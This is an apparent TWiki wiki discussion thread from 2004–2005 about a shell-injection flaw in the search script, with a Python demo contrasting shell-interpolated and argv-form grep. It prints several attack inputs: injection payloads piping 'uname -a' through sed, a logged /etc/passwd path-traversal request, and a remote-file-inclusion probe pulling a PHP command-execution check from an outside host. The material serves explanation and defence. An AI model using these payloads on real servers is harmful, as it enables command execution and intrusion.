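The quoting point above is the whole bug class, and it is easiest to see in running code. The following is an added example, not TWiki's own code (TWiki's search is Perl; this is a Python rendering of the same shape): the vulnerable function builds one command string with the search term inside hand-placed single quotes and hands it to /bin/sh, while the safe one passes an argv list so no shell ever parses the term. The topic files and the payload are constructed here; the payload keeps the reported structure but runs `echo` in place of `id`/`uname`, and `grep -F` stands in for `fgrep`.

```python
"""Added example, not TWiki's code: shell-interpolated grep (vulnerable)
next to argv-form grep (safe), driven by a payload of the reported shape."""
import os
import shutil
import subprocess
import tempfile


def make_sample_web():
    """Create a temporary 'web' of two topic files (constructed test data)."""
    web = tempfile.mkdtemp(prefix="twiki-web-")
    for name, body in (("WebHome.txt", "Welcome to the wiki\n"),
                       ("Notes.txt", "Nothing here matches\n")):
        with open(os.path.join(web, name), "w") as fh:
            fh.write(body)
    files = sorted(os.path.join(web, f) for f in os.listdir(web))
    return web, files


def search_vulnerable(term, files):
    """Mirrors the flawed pattern: quote the term by hand, let a shell parse it.
    A single quote inside the term ends the quoting; everything after it is
    shell syntax. stdin is /dev/null so the dangling first grep cannot block."""
    cmd = "grep -F -i -l -- '%s' %s" % (term, " ".join(files))
    run = subprocess.run(cmd, shell=True, stdin=subprocess.DEVNULL,
                         capture_output=True, text=True)
    return run.stdout


def search_safe(term, files):
    """No shell: argv list, the term is one argument, -- ends option parsing."""
    run = subprocess.run(["grep", "-F", "-i", "-l", "--", term, *files],
                         stdin=subprocess.DEVNULL, capture_output=True, text=True)
    return run.stdout


# Same structure as the reported payloads; the command group is a harmless
# echo so the demo proves the injection without running id or uname.
PAYLOAD = ("doesnotexist1'; (echo INJECTED) | "
           "sed 's/\\(.*\\)/__BEGIN__\\1__END__.txt/'; "
           "grep -i -l -- 'doesnotexist2")


def demo():
    """Run both variants against the sample web and return their stdout."""
    web, files = make_sample_web()
    try:
        return {
            "vulnerable": search_vulnerable(PAYLOAD, files),
            "safe": search_safe(PAYLOAD, files),
            "legit": search_safe("welcome", files),
        }
    finally:
        shutil.rmtree(web, ignore_errors=True)


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name}: {out!r}")
```

The vulnerable call returns the line `__BEGIN__INJECTED__END__.txt`: the search script would then list a topic called __BEGIN__INJECTED__END__, which is exactly why the attackers wrapped their command output with sed. The safe call returns nothing, because the whole payload is a single fixed string that matches no topic, and an ordinary term still finds WebHome.txt. Note that `--` was already on the original command line; it keeps grep from reading the term as options but is no help once a shell has parsed the string.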

Antonio, it's not a guaranteed protection, but if you GoogleYourTWiki and delete/move/rename the search cgi you take out the primary attack vector. This would give you time and breathing room to assess the progress/quality of the upcoming twiki code security audit.

There are still potential issues from registered users misusing embedded %SEARCH% constructs, but that is a whole different class of problem.

-- MattWilkie - 12 Dec 2004

Found the following in my logfiles today:

| 09 Jan 2005 - 01:13 | Main.TWikiGuest | search | TWiki | doesnotexist1; (uname -a) | sed s/\(.*\)/__BEGIN__\1__END__.txt/; fgrep -i -l -- doesnotexist2  | 200.225.194.49 |

200.225.194.49 resolves to 225-194-049.ctbctelecom.com.br, i.e. a Brazilian provider. The HTTP referrer of the hacking attempt looks like this:

http://www.google.com.br/search?q=allinurl:*.de*/*twiki&num=100&hl=pt-BR&lr=&start=100&sa=N

So someone was using Google Brazil to search all TWiki installations in Germany. This query lists more than 200000 results. I don't think I was affected since I installed the search patch some time ago, but I'm still checking my site now. Other sites might have been compromised by this mass attack, though.

What do you guys do about such attempts? Do you try to report them to the provider in order to get them investigate the issue?

-- ClausBrod - 09 Jan 2005

I've generally not had any luck reporting hack or probe attempts, logged by my firewall, to ISPs. I usually just ignore these - if the cracker has any clue they'll be in an Internet cafe or using a compromised PC, so there's no way to trace them anyway even if the ISP did take action.

-- RichardDonkin - 09 Jan 2005

I was first hit by this in Dec 2004, and did a post-mortem (see the results in plain English, including all commands run (parsed from referrer logs), and the subsequent backdoor compiled and installed as /dev/shm/rs.zip). Just yesterday (2 Feb 2005) my referrer logs showed another (luckily, unsuccessful) attack. I really hope everyone out there has got this patched by now.....

-- MichaelNielsen - 04 Feb 2005

Thanks for sharing your abridged and eminently readable exploit story. BTW, at the end you mention a yearning for a java-based twiki, have you seen TWikiVsXWiki? It follows a lot of the twiki conventions, or at least it used to. It is becoming more and more divergent as development progresses.

-- MattWilkie - 04 Feb 2005

This is slightly off topic but I didn't have anywhere better to post it:

I found this in my log today...

213.130.26.7 - - [07/Apr/2005:22:36:32 +0200] "POST /twiki/bin/view/Main/WebHome?rev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 55749 "http://www.google.com/" "Java/1.4.2_01"
213.130.26.7 - - [07/Apr/2005:22:36:41 +0200] "POST /twiki/bin/view/Main/WebHome?rev=http://fluster1.narod.ru/check.txt HTTP/1.0" 200 55962 "http://www.google.com/" "Java/1.4.2_01"

(in case they take it down or move it)

http://fluster1.narod.ru/check.txt contains:

<?
print "<font size='+3' color='red'>";
$cmd="echo itisvulnerable";
print "<b>PassThru</b> : ";
PassThru($cmd);
print "<br><b>System</b> : ";
system($cmd);
print "<br><b>Exec</b> : ";
exec($cmd);
?>
and http://fluster1.narod.ru has a skull and bones image

and the title says "Owned_by_p4r4Z!73"

This was also in the page:

<script language="JavaScript" src="http://bs.yandex.ru/show/163"></script>
<!-- mailto:spm111@yandex.ru -->

I don't know if this information is useful but I wanted to report it anyway.

-- TravisBarker - 07 Apr 2005

Topic attachments
log (10.1 K, 2004-12-05, AntonioPiccolboni): dplinux.org
Topic revision: r34 - 2005-04-07 - TravisBarker